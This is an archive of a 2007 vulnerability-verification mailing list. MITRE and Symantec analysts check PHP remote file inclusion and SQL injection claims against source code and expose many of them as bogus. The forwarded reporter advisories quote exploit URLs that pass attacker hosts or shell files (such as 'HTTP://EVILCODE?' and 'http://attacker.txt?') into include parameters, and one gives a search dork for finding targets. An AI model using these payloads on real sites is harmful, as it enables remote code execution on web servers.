bug found on admin/controls/cart.php

include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"

From coley at mitre.org Wed Jan 10 21:17:40 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 10 Jan 2007 21:17:40 -0500 (EST)
Subject: [VIM] source verify - Axiom RFI
Message-ID: <200701110217.l0B2HeEE004148@faron.mitre.org>

Researchers: Dr.Pantagon / Dr.Trojan (DeltahackingTEAM)

Ref: http://www.milw0rm.com/exploits/3108

Specified download simply checks that $baseAxiomPath is non-empty before
using it:

  if (!isset($baseAxiomPath) || strlen($baseAxiomPath) == 0) {
    Header("Location: index.php");
    die();
  }

  include_once($baseAxiomPath . "/themes/sickphp/theme.php");

So, looks legit.

- Steve

From rkeith at securityfocus.com Fri Jan 12 09:58:32 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Fri, 12 Jan 2007 07:58:32 -0700 (MST)
Subject: [VIM] bogus [Fwd: microBlog <= (config_file) Remote File Include Vulnerability] (fwd)
Message-ID:

The email quotes why it is bogus in fact.

  $config_file = "./config.php";
  include "{$config_file}";

This was not posted to Bugtraq, just forwarding for information purposes.
-- 
Rob Keith
Symantec

-------- Original Message --------
Subject: microBlog <= (config_file) Remote File Include Vulnerability
Date: Sat, 06 Jan 2007 04:51:46 +0300
From: Mr.3FReeT HaCKer
To: webmaster at securityfocus.com
CC: listadmin at securityfocus.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
microBlog <= (config_file) Remote File Include Vulnerability

Found By : Mr.3FReeT
Risk : High
Class : Remote File Include
URL : http://www.hotscripts.com/jump.php?listing_id=53733&jump_type=1
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code in : index.php , rss.php , upgrade.php

$config_file = "./config.php";
include "{$config_file}";
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ExploiT :.
^^^^
www.site.com/[path]/index.php?config_file=shellcode.txt?
www.site.com/[path]/rss.php?config_file=shellcode.txt?
www.site.com/[path]/upgrade.php?config_file=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GReeTz To : [ Dr.2 ] , [ Asbmay ] , [ General C ] , [ Q8^RoCK ] , And Dmar7 TeaM
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From rkeith at securityfocus.com Fri Jan 12 10:06:47 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Fri, 12 Jan 2007 08:06:47 -0700 (MST)
Subject: [VIM] bogus [Fwd: myBloggie <= (bloggie_root_path) Remote File Include Vulnerability] (fwd)
Message-ID:

Most of the files each predefine the 'bloggie_root_path' parameter.

In index.php:

  $bloggie_root_path = "";

In genscode.php:

  $bloggie_root_path = './';

And there is anti-hacking code to make sure 'index.php' is called:

  if ( !defined('IN_BLOGGIE') ) {
    die("Hacking attempt");
  }

-- 
Rob Keith
Symantec

-------- Original Message --------
Subject: myBloggie <= (bloggie_root_path) Remote File Include Vulnerability
Date: Sat, 06 Jan 2007 04:31:27 +0300
From: Mr.3FReeT HaCKer
To: webmaster at securityfocus.com
CC: listadmin at securityfocus.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
myBloggie <= (bloggie_root_path) Remote File Include Vulnerability

Found By : Mr.3FReeT
Risk : High
Class : Remote File Include
URL : http://mywebland.com/dl.php?id=20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code in : index.php , genscode.php , init.php ..... > May be all :) <

include_once($bloggie_root_path.'config.php');
include_once($bloggie_root_path.'includes/db.php');
include_once($bloggie_root_path.'includes/template.php');
include_once($bloggie_root_path.'includes/functions.php');
include_once($bloggie_root_path.'includes/function-format.php');
include_once($bloggie_root_path.'includes/classes.php');
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit :.
^^^^
www.site.com/[path]/index.php?bloggie_root_path=shellcode.txt?
www.site.com/[path]/init.php?bloggie_root_path=shellcode.txt?
www.site.com/[path]/genscode.php?bloggie_root_path=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GreeTz to : [ Dr.2 ] , [ Asbmay ] , [ General C ] , [ Qt^RoCK ] , All Dmar7 Team ....
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
From heinbockel at mitre.org Fri Jan 12 13:18:55 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Fri, 12 Jan 2007 13:18:55 -0500
Subject: [VIM] Source Verify of LunarPoll PollDir RFI
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC017D819B@IMCSRV5.MITRE.ORG>

Researcher: ilker Kandemir
BUGTRAQ:20070112 LunarPoll (PollDir) Remote File Include Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/456697/100/0/threaded

Claim: RFI in the PollDir parameter in show.php

Source, show.php, lines 1-5:

> echo "\n\n\n\n\n";
> // Includes the functions
> require_once($PollDir.'/includes/functions.php');
> require_once($PollDir.'/includes/IO.php');

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From rkeith at securityfocus.com Fri Jan 12 15:10:58 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Fri, 12 Jan 2007 13:10:58 -0700 (MST)
Subject: [VIM] [Bogus - partly] V TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability (fwd)
Message-ID:

http://www.milw0rm.com/exploits/3118

Half of this is bogus. In i-index.php the $chemin parameter is clearly
defined. However in the i-accueil.php script this appears legit.

In i-index.php:
Line 12: $chemin = "." ;

-- 
Rob Keith
Symantec

From str0ke at milw0rm.com Fri Jan 12 15:38:55 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 12 Jan 2007 14:38:55 -0600
Subject: [VIM] [Bogus - partly] V TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability (fwd)
In-Reply-To:
References:
Message-ID: <814b9d50701121238w243a09c0q517ded3bb294d7d6@mail.gmail.com>

Rob,

I didn't even see the i-index.php mentioned in his short advisory.
Removed the 50 percent that wasn't working.

/str0ke

On 1/12/07, rkeith at securityfocus.com wrote:
> http://www.milw0rm.com/exploits/3118
>
> Half of this is bogus. In i-index.php the $chemin parameter is clearly
> defined. However in the i-accueil.php script this appears legit.
>
> In i-index.php:
> Line 12: $chemin = "." ;
>
> --
> Rob Keith
> Symantec
>

From str0ke at milw0rm.com Fri Jan 12 16:59:35 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 12 Jan 2007 15:59:35 -0600
Subject: [VIM] Fwd: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
In-Reply-To:
References:
Message-ID: <814b9d50701121359m54561b07v8b3f8ba8e7066c2a@mail.gmail.com>

Naig doesn't seem vulnerable since $this_path is set with the line below.

$this_path = substr($_SERVER["SCRIPT_FILENAME"],0,max(strrpos($_SERVER["SCRIPT_FILENAME"],"/"),strrpos($_SERVER["SCRIPT_FILENAME"],"\\"))+1);

/str0ke

---------- Forwarded message ----------
From: me you
Date: Jan 12, 2007 3:50 PM
Subject: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Cc: submit at milw0rm.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Naig <= 0.5.2 (this_path) Remote File Include Vulnerability

Script : Naig
Version : 0.5.2
URL : http://mesh.dl.sourceforge.net/sourceforge/naig/naig-0.5.2.zip
Found By : -= BorN To K!LL =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
code in : index.php

require($this_path."config.inc.php");
require($this_path."Naig-includes/naig.inc.php");
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exlo!t :.
^^^^
www.site.com/[path]/index.php?this_path=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GreeTz to : Dr.2 , Asbmay , ToOoFa , Q8^RoCK , SHiKaA .... All My friends ..
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
From jericho at attrition.org Sat Jan 13 07:36:21 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 13 Jan 2007 07:36:21 -0500 (EST)
Subject: [VIM] Interesting advisory comments and timeline
In-Reply-To: <200701110012.l0B0CrLm002681@faron.mitre.org>
References: <200701110012.l0B0CrLm002681@faron.mitre.org>
Message-ID:

: http://www.mnin.org/advisories/2007_firepass.pdf
:
: "For reasons withheld, this advisory will not contain details on
: vulnerable versions of FirePass. However, this information should
: certainly be available from the vendor's website. We would suggest
: creating a portal account and viewing the F5 CERT advisories and
: vulnerabilities page."
:
: Jul 2006 Discovered and reported a majority of vulnerabilities
: Long story, don't ask.

Which screams.. "ask". Has anyone?

From rkeith at securityfocus.com Mon Jan 15 10:04:19 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Mon, 15 Jan 2007 08:04:19 -0700 (MST)
Subject: [VIM] [Bogus] [ilkerkandemir@mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability] (fwd)
Message-ID:

The tc_config parameter is clearly defined in the config.php file, which
is called at the beginning of every script.

---------- Forwarded message ----------
Date: Sat, 13 Jan 2007 10:00:46 -0700
From: Teo Adams
Subject: [Bogus] V [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability]

All of these scripts include a config file that sanitizes the reported
parameter.
> ----- Forwarded message from ilkerkandemir at mynet.com -----
>
> From: ilkerkandemir at mynet.com
> Subject: Trevorchan <= v0.7 Remote File Include Vulnerability
> To: bugtraq at securityfocus.com
> Date: 13 Jan 2007 11:33:28 -0000
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> Message-ID: <20070113113328.6236.qmail at securityfocus.com>
>
> -------------------------------------------------------------------------------------------------------------------
>
> AYYILDIZ.ORG PreSents...
>
> Script: Trevorchan v0.7
> Download: http://rel.trevorchan.org/Releasev07.zip
>
> Contact: ilker Kandemir
>
> Code:
> require_once($tc_config['rootdir']."/inc/functions.php");
> require_once($tc_config['rootdir']."/inc/encryption.php");
>
> -------------------------------------------------------------------------------------------------------------------
>
> Exploit:
> upgrade.php?tc_config[rootdir]=http://attacker.txt?
> paint_save.php?tc_config[rootdir]=http://attacker.txt?
> menu.php?tc_config[rootdir]=http://attacker.txt?
> manage.php?tc_config[rootdir]=http://attacker.txt?
> banned.php?tc_config[rootdir]=http://attacker.txt?
>
> -------------------------------------------------------------------------------------------------------------------
>
> Tnx: H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
> Special Tnx: AYYILDIZ.ORG
>
> ----- End forwarded message -----
>

-- 
Rob Keith
Symantec

From rkeith at securityfocus.com Tue Jan 16 13:18:29 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Tue, 16 Jan 2007 11:18:29 -0700 (MST)
Subject: [VIM] [bogus] Re: V [r.5.7@hotmail.com: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability] (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Tue, 16 Jan 2007 10:11:26 -0700 (MST)
From: pjungles at securityfocus.com
Subject: [bogus] Re: V [r.5.7 at hotmail.com: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability] (fwd)

Install checks for register_global on and magic quotes... The script set
it to $phpbb_root_path = "./" before including. New version as well as
the version reported vuln.

PJ

>
> ----- Forwarded message from me you -----
>
> From: "me you"
> Subject: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include
> Vulnerability
> To: submit at milw0rm.com
> Cc: bugtraq at securityfocus.com
> Date: Tue, 16 Jan 2007 13:52:57 +0000
> Message-ID:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
>
> Script : Gallery
>
> Version : 1.4.4-pl4
>
> URL :
> http://puzzle.dl.sourceforge.net/sourceforge/gallery/gallery-1.6-alpha3.tar.gz
>
> Author : BorN To K!LL
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> Code in :. contrib/phpBB2/modules.php
>
> include_once($phpbb_root_path . 'extension.inc');
> include_once($phpbb_root_path . 'common.'.$phpEx);
> include_once($phpbb_root_path . 'includes/functions.'.$phpEx);
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> Explo!t :.
> ^^^^^
> www.site.com/[path]/contrib/phpBB2/modules.php?phpbb_root_path=shellcode.txt?
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> GreeTz to : Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke
> ...
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> ----- End forwarded message -----
>

-- 
Rob Keith
Symantec

From coley at linus.mitre.org Wed Jan 17 16:08:41 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 17 Jan 2007 16:08:41 -0500 (EST)
Subject: [VIM] grsecurity/PaX dispute of Digital Armaments claims
Message-ID:

There was a followup to Bugtraq I know, but here's something more direct:

http://grsecurity.net/news.php#digitalfud

"The company in question is the same company that claimed a Linux 2.6.x
remote root which never came to fruition... As the PaX team has mentioned
on the forums (see http://forums.grsecurity.net/viewtopic.php?t=1643),
the function they claim the vulnerability to be in is a trivial function,
which can, and has been, easily checked for any supposed vulnerabilities...
it can safely be said that these vulnerability claims are pure
attention-seeking FUD for a shady company."

- Steve

======================================================
Name: CVE-2007-0253
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0253
Reference: MISC:http://forums.grsecurity.net/viewtopic.php?t=1646
Reference: MISC:http://grsecurity.net/news.php#digitalfud
Reference: MISC:http://www.digitalarmaments.com/news_news.shtml

** DISPUTED ** Unspecified vulnerability in the grsecurity patch has
unspecified impact and remote attack vectors, a different vulnerability
than the expand_stack vulnerability from the Digital Armaments 20070110
pre-advisory.
NOTE: the grsecurity developer has disputed this issue, stating that "the
function they claim the vulnerability to be in is a trivial function,
which can, and has been, easily checked for any supposed vulnerabilities."
The developer also cites a past disclosure that was not proven.

======================================================
Name: CVE-2007-0257
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0257
Reference: BUGTRAQ:20070111 Digital Armaments Security Pre-Advisory 11.01.2007: Grsecurity Kernel PaX - Local root vulnerability
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/456626/100/0/threaded
Reference: MISC:http://forums.grsecurity.net/viewtopic.php?t=1646
Reference: MISC:http://grsecurity.net/news.php#digitalfud
Reference: MISC:http://www.digitalarmaments.com/news_news.shtml
Reference: MISC:http://www.digitalarmaments.com/pre2007-00018659.html
Reference: BID:22014
Reference: URL:http://www.securityfocus.com/bid/22014
Reference: FRSIRT:ADV-2007-0155
Reference: URL:http://www.frsirt.com/english/advisories/2007/0155
Reference: SECUNIA:23713
Reference: URL:http://secunia.com/advisories/23713

** DISPUTED ** Unspecified vulnerability in the expand_stack function in
grsecurity PaX allows local users to gain privileges via unspecified
vectors. NOTE: the grsecurity developer has disputed this issue, stating
that "the function they claim the vulnerability to be in is a trivial
function, which can, and has been, easily checked for any supposed
vulnerabilities." The developer also cites a past disclosure that was
not proven.

From coley at mitre.org Wed Jan 17 18:54:08 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 17 Jan 2007 18:54:08 -0500 (EST)
Subject: [VIM] Source VERIFY of SMe FileMailer 1.21 SQL injection
Message-ID: <200701172354.l0HNs8w1027636@faron.mitre.org>

Researcher: CorryL

Ref: BUGTRAQ:20070116 [x0n3-h4ck] SmE FileMailer 1.21 Remote Sql
http://www.securityfocus.com/archive/1/archive/1/457071/100/0/threaded

Product url: http://www.scriptme.com/down/13

The 'ps' parameter is listed. From the index.php:

  if(isset($_POST['s1'])){
    $q1 = "select * from sme_members where name = '$_POST[us]' and password = '$_POST[ps]'";
    $r1 = mysql_query($q1) or die(mysql_error());

Obviously the 'us' parameter looks vulnerable too.

- Steve

From theall at tenablesecurity.com Wed Jan 17 19:25:16 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 17 Jan 2007 19:25:16 -0500
Subject: [VIM] Question about BEA07-155.00
Message-ID: <45AEBE6C.1030601@tenablesecurity.com>

About the recently announced flaw in BEA's JRockit... BEA07-155.00 talks
about JRocket 1.4.2 R4.5 as affected and says to upgrade to JRockit 1.4.2
R6.4. Is anyone familiar with the product? Are those version numbers
correct? I failed to find any reference to those version numbers on BEA's
site anywhere but in their advisory. Instead, I see versions such as
"1.4.2 R24.0", "1.4.2 R26.5", "1.4.6 R27.1" (which is the current one in
the 1.4.2 product line).

support at bea.com's only response to my query has been to tell me to
register on their customer support portal. :-(

George
-- 
theall at tenablesecurity.com

From coley at mitre.org Thu Jan 18 18:55:43 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 18 Jan 2007 18:55:43 -0500 (EST)
Subject: [VIM] vendor ACK for MGB Guestbook issue
Message-ID: <200701182355.l0INthWr014316@faron.mitre.org>

Researcher: SlimTim10

Ref: http://www.milw0rm.com/exploits/3141

Today Jan 18, the vendor site is:

  http://www.tv-kritik.net/mgb/index.php

A google translation says:

  "18.01.2007 | MGB 0.5.4.6 publishes SAFETY UPDATE/SECURITY UPDATES...
  the hacker attacks of yesterday forced me briefly before the publication
  of the MGB 0,6 to it. The safety gap over the hackers entrance created
  myself, I eliminated."

Previous posts have similar related discussion.

A diff between 0.5.4.5 and 0.5.4.6 was rather extensive, but review of
email.php shows:

  > $getid = htmlspecialchars(stripslashes(strip_tags(trim($_GET[id]))), ENT_QUOTES);
  20c23
  ...
  < $sql="SELECT email, name FROM $db[entrys] WHERE id=".$_GET[id]." ORDER BY ID DESC";
  ...
  > $query = "SELECT email, name FROM $db[entrys] WHERE id='".$getid."' LIMIT 1";

which is obviously intended to cleanse the id parameter from email.php,
although the use of htmlspecialchars in an SQL query seems prone to error.

- Steve

From coley at mitre.org Thu Jan 18 19:16:32 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 18 Jan 2007 19:16:32 -0500 (EST)
Subject: [VIM] source verify: Uberghey CMS 0.3.1 RFI
Message-ID: <200701190016.l0J0GWBf014561@faron.mitre.org>

Researcher: GolD_M = Mahmood_ali

Ref: http://www.milw0rm.com/exploits/3147

The referenced include() statement is the first executable statement in
the 0.3.1 source code for frontpage.php.

- Steve

From dm at securityfocus.com Fri Jan 19 17:07:21 2007
From: dm at securityfocus.com (dm at securityfocus.com)
Date: Fri, 19 Jan 2007 15:07:21 -0700
Subject: [VIM] [bogus RFI] [k3g@hackermail.com: b2evolution 1.9.1]
Message-ID: <20070119220721.GV27939@securityfocus.com>

Hey,

Just rejected a report to Bugtraq. This one already got debunked, see:

http://www.securityfocus.com/archive/1/444900

So a repeat of an old bogus report.
----- Forwarded message from mr alkomandoz -----

From: "mr alkomandoz"
Subject: b2evolution 1.9.1
To: bugtraq at securityfocus.com
Date: Sat, 20 Jan 2007 06:10:22 +0800
Message-Id: <20070119221022.CC37BB0FEF at ws4-4.us4.outblaze.com>

-----------------------------------------------
b2evolution 1.9.1 Remote File Include Vulnerability
-----------------------------------------------
Author: Alk()mand()z
-----------------------------------------------
Code:
require_once $inc_path.'_main.inc.php';
-----------------------------------------------
3xplo!t:
blogs/index.php?inc_path=[Evil-Code]
-----------------------------------------------
download:
http://sourceforge.net/project/downloading.php?groupname=evocms&filename=b2evolution-1.9.1-2006-12-02.zip&use_mirror=heanet
-----------------------------------------------
Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa
SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team
###################################################
# AsB-MaY.NeT & D4eG.OrG
###################################################

----- End forwarded message -----

-- 
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

From coley at mitre.org Mon Jan 22 12:01:47 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 22 Jan 2007 12:01:47 -0500 (EST)
Subject: [VIM] a-forum xss - who? what? where?
Message-ID: <200701221701.l0MH1lGM027245@faron.mitre.org>

Forgive me for channelling Vinnie Barbarino from an old 70's US show...

Researcher: sn0oPy

Ref: BUGTRAQ:20070119 a-forum xss
http://www.securityfocus.com/archive/1/archive/1/457503/100/0/threaded

sn0oPy gives a google-dork URL that shows a number of French web sites
that apparently have the relevant program.
But the vendor site, www.mistersp.com, doesn't say anything about
"a-forum" and a view-source of some of the google-dork'ed sites doesn't
point to this, either.

So, who developed what product?

- Steve

From coley at mitre.org Mon Jan 22 20:05:11 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 22 Jan 2007 20:05:11 -0500 (EST)
Subject: [VIM] old OdysseusBlog XSS report - possibly incorrect
Message-ID: <200701230105.l0N15B7Y007250@faron.mitre.org>

Researcher: the_Edit0r

Ref: BUGTRAQ:20061116 OdysseusBlog => 1.0.0 Cross Site Scripting
http://archives.neohapsis.com/archives/bugtraq/2006-11/0274.html

I downloaded OdysseusBlog 1.0.0 and looked at the source. We have a
couple examples like this:

> $pid = $_GET['page'];
>
> ...
> $next = "
> << Previous 5 | Next 5 >>
> ";

$pid +- 1 would evaluate to 1 or -1, so this looks faulty. Maybe there's
a detailed error reporting level that would spit out a message, but E_ALL
didn't work for me. And even so, you get into XSS within PHP's error
reporting itself, whatever that bug was that they fixed about a year ago.

- Steve

From rkeith at securityfocus.com Tue Jan 23 15:57:59 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Tue, 23 Jan 2007 13:57:59 -0700 (MST)
Subject: [VIM] [bogus] [r.5.7@hotmail.com: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability] (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Tue, 23 Jan 2007 10:03:34 -0700 (MST)
From: Ashif Samnani
Subject: re: [review]V [r.5.7 at hotmail.com: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability] (fwd)

Not Vuln

In index.php

  $include_path = dirname(__FILE__);
  require_once $include_path."/admin/config.inc.php";
  require_once $include_path."/lib/$DB_CLASS";
  require_once $include_path."/lib/image.class.php";
  require_once $include_path."/lib/template.class.php";

In addentry.php

  $include_path = dirname(__FILE__);
  require_once $include_path."/admin/config.inc.php";
  require_once $include_path."/lib/$DB_CLASS";
  require_once $include_path."/lib/image.class.php";
  require_once $include_path."/lib/template.class.php";
  require_once $include_path."/lib/vars.class.php";
  require_once $include_path."/lib/add.class.php";
  require_once $include_path."/lib/phrase.class.php";

In picture.php

  $include_path = dirname(__FILE__);
  require_once $include_path."/admin/config.inc.php";

Looks like include_path is being defined in all three cases.

Note: This reporter has been reporting bogus RFI's on bugtraq. I think
this is the third time I've seen him doing this.
Ashif

----- Forwarded message from me you -----

From: "me you"
Subject: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability
To: submit at milw0rm.com
Cc: bugtraq at securityfocus.com
Date: Tue, 23 Jan 2007 08:52:30 +0000
Message-ID:

###################################################
Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability

Script: Advanced Guestbook
Version: 2.4.2
URL: http://proxy2.de/js/dl86d7a2.php
Found By : BorN To K!LL
###################################################
Bug in : index.php , addentry.php , picture.php

code :.
require_once $include_path."/admin/config.inc.php";
require_once $include_path."/lib/$DB_CLASS";
require_once $include_path."/lib/image.class.php";
require_once $include_path."/lib/template.class.php";
###################################################
Explo!T:
^^^^^
/index.php?include_path=[SHe1L-CoDe]
/addentry.php?include_path=[SHe1L-CoDe]
/picture.php?include_path=[SHe1L-CoDe]
###################################################
GreeTz :. Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , ThE-LoRd-Of-CrAcKiNg , str0ke ..
###################################################

----- End forwarded message -----

-- 
Rob Keith
Symantec

From coley at linus.mitre.org Wed Jan 24 18:15:27 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 24 Jan 2007 18:15:27 -0500 (EST)
Subject: [VIM] a-forum xss - who? what? where?
In-Reply-To: <200701221701.l0MH1lGM027245@faron.mitre.org>
References: <200701221701.l0MH1lGM027245@faron.mitre.org>
Message-ID:

from a CVE analyst who decided to dig a little deeper...

ACCURACY: The script can be downloaded from
www.phpscripts-fr.net/scripts/script.php?id=346. On this page, there is
a house icon that points to www.mistersp.com, suggesting that the author
of this www.phpscripts-fr.net page believed that www.mistersp.com was the
home web site associated with the script. This was not directly
confirmed. This page also says "A-Forum par Arnaud Guyonne." The domain
registrant for mistersp.com is Danielle Guyonne (same last name). The
download contains "Copyright Arnotic 1999 - 2000." According to
forum.kimsufi.com/member.php?u=177, Arnaud Guyonne uses the nickname
Arnotic. Thus, the contents of the download map to the name Guyonne, and
thus map (given an apparent family connection) to mistersp.com.

ACCURACY: psuedo was a misspelling by the researcher.

From rkeith at securityfocus.com Sat Jan 27 15:38:36 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Sat, 27 Jan 2007 13:38:36 -0700 (MST)
Subject: [VIM] [bogus] [trzindan@hotmail.fr: local Calendar System v1.1 (lcStdLib.inc) Remote File Include] (fwd)
Message-ID:

Every single script has the first line as:

  include("./config.php");

That file clearly defines the parameters with hardcoded data.
-- 
Rob Keith
Symantec

----- Forwarded message from trzindan at hotmail.fr -----

From: trzindan at hotmail.fr
Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include
To: bugtraq at securityfocus.com
Date: 27 Jan 2007 17:46:55 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070127174655.27269.qmail at securityfocus.com>

+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include
Tr_ZiNDaN
trzindan at hotmail.fr
Turkey
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------
code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
--------------------------------------------------------------------------------------------
exploit:
local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?
--------------------------------------------------------------------------
Thanx str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy..
-------------------------------------------------------------------------
##---ALL MusLim Hackers------------------------------------------------------------------------------------------------

----- End forwarded message -----

From rkeith at securityfocus.com Mon Jan 29 12:27:46 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Mon, 29 Jan 2007 10:27:46 -0700 (MST)
Subject: [VIM] [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion] (fwd)
Message-ID:

This report came up on the weekend and had some conflicting data. The
version was wrong for the software specified, and the script didn't
exist. This new report points to the correct software. However, the
report is still bogus as a configuration file (globals.php) called at
the beginning of the script clearly defines the specified vulnerable
parameter.

-- 
Rob Keith
Symantec

----- Forwarded message from Michał Melewski -----

From: Michał Melewski
Subject: Re: Open Conference Systems = 2.8.2 Remote File Inclusion
To: trzindan at hotmail.com
Cc: bugtraq at securityfocus.com
Date: Sat, 27 Jan 2007 21:55:56 +0100
